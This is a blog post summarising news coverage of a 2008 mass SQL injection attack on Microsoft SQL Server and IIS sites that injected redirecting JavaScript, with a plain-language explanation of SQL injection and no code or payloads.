In what has to be one of the largest SQL based Web attacks on record, last weekend Google says over 70,000 domains were affected by a massive attack. This time it wasn't Oracle that was affected it was Microsoft SQL and IIS that were hacked. And here I was giving Oracle grief for not patching their errors, guess I should have been looking toward Microsoft instead.
Using a MDAC vulnerably that was supposed to have been patched in September of 2006 they used SQL injection to infect the sites. For those unfamiliar with SQL injection, the hackers insert SQL commands in what the website thinks is data, and instead of performing its normal processes, the hacked server performs the hackers inserted SQL commands.
Check out what CNET has to say in Massive SQL-based Web attack decoded:
On Wednesday, the SANS Internet Storm Center and others published details about the massive SQL-based Web attack that occurred over the weekend. The attack, says SANS, is similar to a smaller SQL-injection attack seen last November. At least 70,000 sites were compromised in short period of time, leading some speculate this was an automated attack..
From logs files, the attack code appears to exploit a variety of SQL injection vulnerabilities existing on Web sites using Microsoft SQL or Microsoft IIS. On the vulnerable sites, malicous javascript is injected into all varchar and text fields in the SQL database such that when a visitor hits the site, their browsers, if vulnerable, are then redirected to another domain--in this case, us8010.com.
Roger Thompson, chief research officer at Grisoft, identified one exploits served at the malicious server as taking advantage of MS06-014, a MDAC vulnerability that Microsoft patched in September 2006. He also noted that "this domain uc8010(dot)com was registered just a few days ago (Dec 28), and yet, at one point Google showed script injections pointing to it were showing up on over 70k domains." Yet by January 5, 2008, most of these domains had already been cleaned.
Sphere: Related Content
0 comments:
Post a Comment